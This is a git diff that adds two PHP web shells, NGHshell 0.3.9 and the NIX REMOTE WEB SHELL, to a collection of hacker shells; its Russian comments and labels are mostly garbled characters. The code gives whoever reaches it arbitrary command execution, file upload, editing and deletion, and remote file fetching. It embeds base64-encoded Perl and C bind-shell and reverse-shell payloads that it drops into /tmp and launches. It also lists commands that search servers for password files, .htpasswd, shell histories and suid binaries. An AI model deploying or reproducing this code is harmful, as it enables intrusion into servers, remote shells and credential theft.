+          ."fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsN"
+          ."Cm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7"
+          ."DQpjbG9zZShTVERFUlIpOw==";
+
+if ($act == "showlogo") {
+ header("Content-type: image/gif");
+ echo base64_decode($logo);
+ exit;
+}
+if ($login) {
+ Sleep(1);
+ if ($luser == $user && $lpass == $pass) {
+  setcookie("logined", $pass);
+ } else {
+  die("<font color=#DF0000>Login error</font>");
+ }
+} else {
+ $logined = @$_COOKIE['logined'];
+ if ($logined != $pass) {
+?>
+ <form action=<?=$script?> method=POST>
+ user: <input type=text name=user><br>
+ pass: <input type=password name=pass><br><br>
+ <input type=submit name=login value=login>
+ </form>
+<?
+  exit;
+ }
+}
+?>
+ <html>
+ <head>
+ <style type="text/css"><!--
+ body {background-color: #cccccc; color: #000000; FONT-SIZE: 10pt}
+ body, td, th, h1, h2 {font-family: Verdana;}
+ pre {margin: 0px; font-family: monospace;}
+ a:link {color: #000099; text-decoration: none;}
+ a:visited {color: #000099; text-decoration: none;}
+ a:hover {text-decoration: underline;}
+ table {border-collapse: collapse;}
+ td, th { border: 1px solid #000000; font-size: 75%; vertical-align: baseline;}
+ .e {background-color: #ccccff; font-weight: bold; color: #000000;}
+ .h {background-color: #9999cc; font-weight: bold; color: #000000;}
+ .v {background-color: #cccccc; color: #000000;}
+ .v2 {background-color: #dfdfdf; color: #000000;}
+ .v3 {background-color: #FEB4BB; color: #000000;}
+ i {color: #666666; background-color: #cccccc;}
+ img {float: right; border: 0px;}
+ hr {width: 600px; background-color: #cccccc; border: 0px; height: 1px; color: #000000;}
+ input, textarea {FONT-SIZE: 8pt; border: 1px solid #222222; color: #222222; background-color: #dfdfdf; }
+ //--></style>
+ <title>Webcommander at <?=$_SERVER["HTTP_HOST"]?></title>
+ </head>
+ <body>
+<?
+$path = @rawurldecode($_GET['dir']);
+$cmd = @$_GET['cmd'];
+if ($act == "mass") {
+ $post = array_keys($_POST);
+ $todo = $_POST[$post[sizeof($post)-2]];
+ $to = $_POST[$post[sizeof($post)-1]];
+ for ($i = 0; $i < sizeof($post)-2; $i++) {
+  if ($_POST[$post[$i]]) {
+   if ($todo == "del") {
+    rm($_POST[$post[$i]]);
+   }
+   elseif ($todo == "mv") {
+    mvcp($_POST[$post[$i]], $to."/".$post[$i], $todo);
+   }
+   else {
+    mvcp($_POST[$post[$i]], $to."/".$post[$i], "cp");
+   }
+  }
+ }
+ //exit;
+}
+elseif ($act == mkdir) {
+ $dirname = @$_POST['dirname'];
+ $path = @$_POST['dir'];
+ if (!$dirname) die("<font color=#DF0000>������ ���</font>\n");
+ if (!@mkdir($path.$dirname)) die("<font color=#DF0000>������ ������� �����</font>\n");
+}
+elseif ($act == upload) {
+ $userfile = @$_FILES['userfile']['tmp_name'];
+ $uploaddir = @$_POST['uploaddir'];
+ if (is_uploaded_file($userfile))  {
+  @copy($userfile, $uploaddir.$_FILES['userfile']['name']);
+  @unlink($userfile);
+  $path = $uploaddir;
+ } else die("<font color=#DF0000>������ ��� �������� �����</font>\n");
+}
+elseif ($act == "rm") {
+ $name = @$_GET['name'];
+ rm($name);
+ $inf = pathinfo($name);
+ $path = $inf['dirname'];
+}
+elseif ($act == "viev") {
+ $name = @$_GET['name'];
+ if (file_exists($name)) {
+  echo "<form action=".$script."?act=updatefile method=POST>\n".
+       "���� <b>".$name."</b><br>\n";
+  $out = implode("", file($name));
+  echo "<textarea rows=25 cols=70 name=text>";
+  print_r ($out);
+  echo "</textarea><br>\n".
+       "<input type=hidden name=file value=\"".$name."\">\n".
+       "<input type=submit value=���������>\n".
+       "</form>\n".
+       "[ <a href=javascript:history.go(-1)>back</a> ]";
+ } else die("<font color=#DF0000>���� �� ������</font>\n");
+ exit;
+}
+elseif ($act == "updatefile") {
+ $filename = @$_POST['file'];
+ $text = @$_POST['text'];
+ if (is_writable($filename)) {
+  $handle = fopen($filename, "w+");
+  if (fwrite($handle, stripslashes($text)) === FALSE) {
+   die("<font color=#DF0000>������ ������ � ����</font>\n");
+  }
+ } else die("<font color=#DF0000>���� ���������� ��� ������</font>\n");
+ fclose($handle);
+ $inf = pathinfo($filename);
+ $path = $inf['dirname'];
+}
+elseif ($act == "touch") {
+ $userfile = @$_POST['file'];
+ $userdir = @$_POST['dir'];
+ if (!$userfile) {
+  die("<font color=#DF0000>������ ���</font>\n");
+ }
+ $handle = fopen($userdir.$userfile, "w+");
+ if (fwrite($handle, "") === FALSE)  {
+   die("<font color=#DF0000>������ �������� �����</font>\n");
+ }
+ fclose($handle);
+ $path = $userdir;
+}
+elseif ($act == "renameform") {
+ $name = @$_GET['name'];
+ echo "<form action=".$script."?act=rename method=POST>"
+     ."<b>�������������, ���������� ��� ����������� </b>".$name."<br>"
+     ."<input type=text name=to size=40 value=".$name.">"
+     ."<input type=hidden name=from value=".$name."><br>"
+     ."<input type=radio name=todo value=mv checked> �����������<br>"
+     ."<input type=radio name=todo value=cp> �����������<br>"
+     ."<input type=submit value=Go></form>"
+     ."[ <a href=javascript:history.go(-1)>back</a> ]";
+ exit;
+}
+elseif ($act == "rename") {
+ $from = @$_POST['from'];
+ $to = @$_POST['to'];
+ $todo = @$_POST['todo'];
+ mvcp($from, $to, $todo);
+ $inf = pathinfo($from);
+ $path = $inf['dirname'];
+}
+elseif ($act == "bindshell") {
+ $port = @$_POST['port'];
+ if (!$port) {
+  die("<font color=#DF0000>������� ����</font>");
+ }
+ $file = "/tmp/bd";
+ $handle = fopen($file, "w+");
+ if (fputs($handle, base64_decode($bind)) === FALSE)  {
+   die("<font color=#DF0000>������ �������� ����� ".$file."</font>\n");
+ } else {
+  fclose($handle);
+  passthru("perl ".$file." ".$port." > /dev/null &");
+ }
+}
+elseif ($act == "backconnect") {
+ $port = @$_POST['port'];
+ $addr = @$_POST['addr'];
+ if (!$port || !$addr) {
+  die("<font color=#DF0000>������� ���� � ������</font>");
+ }
+ $file = "/tmp/bcon";
+ $handle = fopen($file, "w+");
+ if (fputs($handle, base64_decode($backcon)) === FALSE)  {
+   die("<font color=#DF0000>������ �������� �����  ".$file."</font>\n");
+ } else {
+  fclose($handle);
+  passthru("perl ".$file." ".$addr." ".$port." > /dev/null &");
+ }
+}
+elseif ($act == "phpinfo") {
+ phpinfo();
+ exit;
+}
+if (!$path) {
+ $dir = getcwd()."/";
+} else {
+ $dir = stripslashes($path);
+ if ($dir[strlen($dir)-1] != "/") $dir .= "/";
+}
+$dir = str_replace("\\", "/", $dir);
+$dir = str_replace("//", "/", $dir);
+$arr = explode("/", $dir);
+for ($i=0; $i<count($arr)-2; $i++) {
+ $back .= $arr[$i]."/";
+}
+?>
+ <table class=e>
+  <tr>
+   <td rowspan=3><img src=<?=$script?>?act=showlogo></td>
+   <td><b>Host:</b></td><td class=v><?=$_SERVER["HTTP_HOST"]?></td>
+  </tr>
+  <tr>
+   <td><b>IP address:</b></td><td class=v><?=$_SERVER["SERVER_ADDR"]?></td>
+  </tr>
+  <tr>
+   <td><b>Software:</b></td><td class=v><?=$_SERVER["SERVER_SOFTWARE"]?></td>
+  </tr>
+ </table>
+ <form action=<?=$script?> method=GET>
+ <b>�������:</b> <input type=text name=cmd value="<?=$cmd?>" size=120>
+ <input type=hidden name=dir value="<?=$dir?>"><br>
+ <textarea rows=8 cols=97>
+<?
+if ($cmd) {
+ exec($cmd, $out);
+ echo convert_cyr_string(implode("\r\n", $out), "a", "w");
+}
+?>
+</textarea></form>
+<form action=<?=$script?>?act=bindshell method=POST>
+<b>Bind /bin/bash at port: </b><input type=text name=port size=8>
+<input type=submit value=Bind>
+</form>
+<form action=<?=$script?>?act=backconnect method=POST>
+<b>Connectback:</b> ������ <input type=text name=addr>
+���� <input type=text name=port size=8>
+<input type=submit value=Connect>
+</form>
+<?
+if($handle = @opendir($dir)) {
+?>
+ <form action=<?=$script?>?act=mass method=POST>
+ <table width=700>
+ <tr class=e><td colspan=7><b><?=$dir?></b></td></tr>
+ <tr class=h><td><a href="<?=$script?>?dir=<?=$back?>"><<</a></td>
+ <td><small><font color=#D1D1E1>size</font></small></td>
+ <td><small><font color=#D1D1E1>date</font></small></td>
+ <td colspan=4><small><font color=#D1D1E1>permissions</font></small></td></tr>
+<?
+ $cssclass = "v";
+ while ($file = readdir($handle)) {
+  if (is_dir($dir.$file) && $file != ".." && $file != ".") {
+   $inf = pathinfo($dir.$file);
+   echo "<tr class=".$cssclass." onmouseover=\"className='v3'\"  onmouseout=\"className='".$cssclass."'\">\n"
+       ."<td><input type=checkbox name=".$file." value=".$dir.$file.">"
+       ."[<a href=\"".$script."?dir=".rawurlencode($inf['dirname'])."/".rawurlencode($inf['basename'])."\">"
+       .$file."</a>]</td><td><b>--dir</b></td><td>".date("d.m.y/H:i", filemtime($dir.$file))."</td>\n"
+       ."<td>".parseperms(fileperms($dir.$file))."</td>\n"
+       ."<td><a href=\"".$script."?act=rm&name=".rawurlencode($dir.$file)."\">DEL</a></td>\n"
+       ."<td colspan=2><a href=\"".$script."?act=renameform&name=".rawurlencode($dir.$file)."\">MOVE(COPY)</a></td></tr>\n";
+   if ($cssclass == "v") $cssclass = "v2";
+   elseif ($cssclass == "v2") $cssclass = "v";
+  }
+ }
+ rewinddir($handle);
+ while ($file = readdir($handle)) {
+  if (is_file($dir.$file)) {
+   echo "<tr class=".$cssclass." onmouseover=\"className='v3'\"  onmouseout=\"className='".$cssclass."'\">\n"
+       ."<td><input type=checkbox name=".$file." value=".$dir.$file.">"
+       ."[".$file."]</td><td>".filesize($dir.$file)."</td><td>\n"
+       .date("d.m.y/H:i", filemtime($dir.$file))."</td>\n"
+       ."<td>".parseperms(fileperms($dir.$file))."</td>\n"
+       ."<td><a href=\"".$script."?act=rm&name=".rawurlencode($dir.$file)."\">DEL</a></td>\n"
+       ."<td><a href=\"".$script."?act=renameform&name=".rawurlencode($dir.$file)."\">MOVE(COPY)</a></td>\n"
+       ."<td><a href=\"".$script."?act=viev&name=".rawurlencode($dir.$file)."\">EDIT</a></td></tr>\n";
+   if ($cssclass == "v") $cssclass = "v2";
+   elseif ($cssclass == "v2") $cssclass = "v";
+  }
+ }
+ closedir($handle);
+?>
+ </table>
+ <b>� ����������:</b> <input type=radio name=mass value=del checked> �������
+ <b>[</b> <input type=radio name=mass value=mv> �����������
+ <input type=radio name=mass value=cp> ����������
+ � <input type=text name=to value="<?=$dir?>"> <b>]</b>
+ <br><input type=submit value=���������>
+ </form>
+ <form action=<?=$script?>?act=mkdir method=POST>
+ <b>������� �����</b><br>
+ <input type=text name=dirname size=40>
+ <input type=hidden name=dir value="<?=$dir?>">
+ <input type=submit value=�������></form>
+ <FORM ENCTYPE=multipart/form-data ACTION=<?=$script?>?act=touch METHOD=POST>
+ <b>������� ������ ����</b><br>
+ <INPUT type=text NAME=file size=40>
+ <input type=hidden name=dir value="<?=$dir?>">
+ <INPUT TYPE=submit VALUE=�������></FORM>
+ <FORM ENCTYPE=multipart/form-data ACTION=<?=$script?>?act=upload METHOD=POST>
+ <b>�������� ����</b><br>
+ <INPUT NAME=userfile TYPE=file size=40>
+ <input type=hidden name=uploaddir value="<?=$dir?>">
+ <INPUT TYPE=submit VALUE=���������></FORM>
+ <a href=<?=$script?>?act=phpinfo>Phpinfo()</a>
+<?
+} else die("<font color=#DF0000>���������� �� �������</font>\n");
+function rm($name) {
+ if (is_file($name)) {
+  if (!@unlink($name)) die("<font color=#DF0000>������ ������� ���� <b>".$name."</b></font>\n");
+ }
+ elseif (is_dir($name)) deldir($name);
+}
+function mvcp($from, $to, $todo) {
+ if ($todo == "mv") {
+  if (is_file($from)) {
+   if (!rename($from, $to)) {
+    die("<font color=#DF0000>������ ��� ����������� ����� ".$from."</font>");
+   }
+  }
+  elseif (is_dir($from)) {
+   mvdir($from, $to, $todo);
+  }
+ } else {
+  if (is_file($from)) {
+   if (!copy($from, $to)) {
+    die("<font color=#DF0000>������ ��� ����������� ����� ".$from."</font>");
+   }
+  }
+  elseif (is_dir($from)) {
+   mvdir($from, $to, "cp");
+  }
+ }
+}
+function deldir($name) {
+ if (@$handle=opendir($name)) {
+  while ($file = readdir($handle)) {
+   if ($file != ".." && $file != ".") {
+    if (is_file($name."/".$file)) {
+     unlink($name."/".$file);
+    }
+    elseif (is_dir($name."/".$file)) {
+     deldir($name."/".$file);
+    }
+   }
+  }
+  closedir($handle);
+ } else die("<font color=#DF0000>������ ������� ����� <b>".$name."</b></font>\n");
+ rmdir($name);
+}
+function mvdir($from, $to, $todo) {
+ if (@$handle = opendir($from)) {
+  mkdir($to);
+  while ($file = readdir($handle)) {
+   if ($file != ".." && $file != ".") {
+    if (is_file($from."/".$file)) {
+     if (!copy($from."/".$file, $to."/".$file)) {
+      die("<font color=#DF0000>������ ��� ����������� ����� ".$from."/".$file."</font>");
+     }
+    }
+    elseif (is_dir($from."/".$file)) {
+     mvdir($from."/".$file, $to."/".$file, $todo);
+    }
+   }
+  }
+  closedir($handle);
+  if ($todo == "mv") deldir($from);
+ } else die("<font color=#DF0000>������ ���������� ����� <b>".$name."</b></font>\n");
+}
+function parseperms($perms)
+{
+ if (!$perms) return "null";
+ if (($perms & 0xC000) == 0xC000) {
+    $info = 'socket ';
+ } elseif (($perms & 0xA000) == 0xA000) {
+    $info = 'link ';
+ } elseif (($perms & 0x8000) == 0x8000) {
+    $info = '-';
+ } elseif (($perms & 0x6000) == 0x6000) {
+    $info = 'b';
+ } elseif (($perms & 0x4000) == 0x4000) {
+    $info = 'dir ' ;
+ } elseif (($perms & 0x2000) == 0x2000) {
+    $info = 'c';
+ } elseif (($perms & 0x1000) == 0x1000) {
+    $info = 'p';
+ } else {
+    $info = 'u';
+ }
+ $info .= (($perms & 0x0100) ? 'r' : '-');
+ $info .= (($perms & 0x0080) ? 'w' : '-');
+ $info .= (($perms & 0x0040) ?
+            (($perms & 0x0800) ? 's' : 'x' ) :
+            (($perms & 0x0800) ? 'S' : '-'));
+ $info .= (($perms & 0x0020) ? 'r' : '-');
+ $info .= (($perms & 0x0010) ? 'w' : '-');
+ $info .= (($perms & 0x0008) ?
+            (($perms & 0x0400) ? 's' : 'x' ) :
+            (($perms & 0x0400) ? 'S' : '-'));
+ $info .= (($perms & 0x0004) ? 'r' : '-');
+ $info .= (($perms & 0x0002) ? 'w' : '-');
+ $info .= (($perms & 0x0001) ?
+            (($perms & 0x0200) ? 't' : 'x' ) :
+            (($perms & 0x0200) ? 'T' : '-'));
+ return $info;
+}
+echo "<br><small>NGHshell 0.3.9 by Cr4sh</body></html>\n";
+
+/* EOF **********************************/
+?>
diff --git a/xakep-shells/PHP/nixrem.php.php.txt b/xakep-shells/PHP/nixrem.php.php.txt
new file mode 100644
index 0000000..9688a5a
--- /dev/null
+++ b/xakep-shells/PHP/nixrem.php.php.txt
@@ -0,0 +1,1772 @@
+<?php
+#########################################################
+#                 NIX REMOTE WEB SHELL                  #
+#       Coded by DreAmeRz          Ver 1.0              # 
+#      ORIGINAL E-MAIL IS: dreamerz@mail.ru             #
+#                               
+#########################################################
+$name="1";	// ����� ������������
+$pass="1";	// ������ ������������
+if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("Access Denied");
+   }
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head>
+<title>NIX REMOTE WEB-SHELL v.1.0</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<meta http-equiv="pragma" content="no-cache">
+<meta http-equiv="Content-Language" content="en,ru"> 
+<META name="autor" content="DreAmeRz (www.Ru24-Team.NET)">
+<style type="text/css">
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+scrollbar-face-color: #FFFFFF;
+scrollbar-shadow-color:#000000 ;
+scrollbar-highlight-color:#FFFFFF;
+scrollbar-3dlight-color: #000000;
+scrollbar-darkshadow-color:#FFFFFF ;
+scrollbar-track-color: #FFFFFF;
+scrollbar-arrow-color: #000000;
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: red;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: black;
+TEXT-DECORATION: none
+}
+A:link {COLOR:black; TEXT-DECORATION: none}
+A:visited { COLOR:black; TEXT-DECORATION: none}
+A:active {COLOR:black; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+</HEAD>
+
+
+<BODY bgcolor="#fffcf9" text="#000000">
+<P align=center>[ <A href="javascript:history.next(+1)">������ ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B>
+v.1.0<FONT color=#linux size=1> Stable </FONT> [ <A href="javascript:history.back(-1)">����� ]</A>[ <A href="?ac=about" title='��� ����� ������...'>� ������� ]</a><BR>
+<A href="?ac=info" title='����� ��� �� ���� �������!'>[ ���������� � �������</A> ][ <A href="?ac=navigation" title='������� ����������� ���������. ��������, ��������������...'>���������</A> ][ <A href="?ac=backconnect" title='��������� backconnect � �������� ������� '>���������
+�������</A> ][ <A href="?ac=eval" title='������ ���� ������ �� php ����� ����� :)'>PHP-���</A> ][ <A href="?ac=upload" title='�������� ������ �����, ���c���� ��������, �������� ������ � ���������� ����������!'>�������� ������</A> ][ <A href="?ac=shell" title='bash shell, ������...'>����������
+������ ]</A> <br><A href="?ac=sql" title='������ � MySQL'> [ MySQL</A> ]<A href="?ac=sendmail" title='������� �-mail ������!'>[ �������� ������</A> ][ <A href="?ac=mailfluder" title='���� ���-�� ������? ����� ���� ����...'>����������</A>
+ ][ <A href="?ac=tools" title='�����������/������������� md5, des, sha1, base64... '>����������� ]</A>[ <A href="?ac=ps" title='���������� ������ ��������� �� ������� � ��������� �� �������!'>������</A> ][ <A href="?ac=art" title='�������������� ������ ������...'>�������������� ������</A> ][ <A href="?ac=exploits" title='id=root gid=0 uid=0'>/root</A> ][ <A href="?ac=selfremover" title='������ ���� ������? ����� ����� ������� � ����...'>������� ����</A> ]</P>
+<?php
+if (ini_get('register_globals') != '1') {
+
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR);
+set_magic_quotes_runtime(0);
+set_time_limit(0);		// ������ ����������� �� �������
+ignore_user_abort(1);	// ������������ ������ ����� � ���������
+error_reporting(0);
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
+$aliases=array(
+'------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a',
+'����� �� ������� ���� ������ �� suid-�����' => 'find / -type f -perm -04000 -ls',
+'����� �� ������� ���� ������ �� sgid-�����' => 'find / -type f -perm -02000 -ls',
+'����� � ������� ���������� ���� ������ �� sgid-�����' => 'find . -type f -perm -02000 -ls',
+'����� �� ������� ������ config' => 'find / -type f -name "config*"',
+'����� �� ������� ������ admin' => 'find / -type f -name "admin*"',
+'����� � ������� ���������� ������ config' => 'find . -type f -name "config*"',
+'����� � ������� ���������� ������ pass' => 'find . -type f -name "pass*"',
+'����� �� ������� ���� ���������� � ������, �������� ��� ������' => 'find / -perm -2 -ls',
+'����� � ������� ���������� ���� ���������� � ������, �������� ��� ������' => 'find . -perm -2 -ls',
+'����� � ������� ���������� ������ service.pwd' => 'find . -type f -name service.pwd',
+'����� �� ������� ������ service.pwd' => 'find / -type f -name service.pwd',
+'����� �� ������� ������ .htpasswd' => 'find / -type f -name .htpasswd',
+'����� � ������� ���������� ������ .htpasswd' => 'find . -type f -name .htpasswd',
+'����� ���� ������ .bash_history' => 'find / -type f -name .bash_history',
+'����� � ������� ���������� ������ .bash_history' => 'find . -type f -name .bash_history',
+'����� ���� ������ .fetchmailrc' => 'find / -type f -name .fetchmailrc',
+'����� � ������� ���������� ������ .fetchmailrc' => 'find . -type f -name .fetchmailrc',
+'����� ������ ��������� ������ �� �������� ������� ext2fs' => 'lsattr -va',
+'�������� �������� ������' => 'netstat -an | grep -i listen',
+'����� ���� php-������ �� ������ password' =>'find / -name *.php | xargs grep -li password',
+'����� ����� � ����� 777' =>'find / -type d -perm 0777',
+'����������� ������ ��' =>'sysctl -a | grep version',
+'����������� ������ ����' =>'cat /proc/version',
+'�������� syslog.conf' =>'cat /etc/syslog.conf',
+'�������� Message of the day' =>'cat /etc/motd',
+'�������� hosts' =>'cat /etc/hosts',
+'������ ������������ 1' =>'cat /etc/issue.net',
+'������ ������������ 2' =>'cat /etc/*-realise',
+'�������� ��� �������' =>'ps auxw',
+'�������� �������� ������������' =>'ps ux',
+'����� httpd.conf' =>'locate httpd.conf');
+
+
+
+/* Port bind source */
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
+jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
+ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
+0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
+mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
+KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
+hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
+OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
+rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
+kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
+7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
+wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
+6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
+hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
+pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
+sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
+0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
+lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
+9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
+pDQpyZXR1cm4gMDsNCn0=";
+
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
+AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
+NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
+QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
+pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
+JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
+0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
+FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
+YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
+NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
+9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
+
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
+HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
+DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
+HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
+CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
+GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
+WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
+iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
+VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
+FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
+KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
+pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
+ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
+uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
+9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
+zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
+QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
+sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
+pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
+zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
+sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+if(isset($uploadphp))
+{
+$socket=fsockopen($iphost,$loadport);					//connect
+fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n");	//request
+while(fgets($socket,31337)!="\r\n" && !feof($socket)) {
+unset($buffer); }
+while(!feof($socket)) $buffer.=fread($socket, 1024);
+$file_size=strlen($buffer);
+$f=fopen($loadnewname,"wb+");
+fwrite($f, $buffer, $file_size);
+echo "������ ������������ �����: $file_size <b><br><br>" ;
+}
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "navigation";}
+
+
+
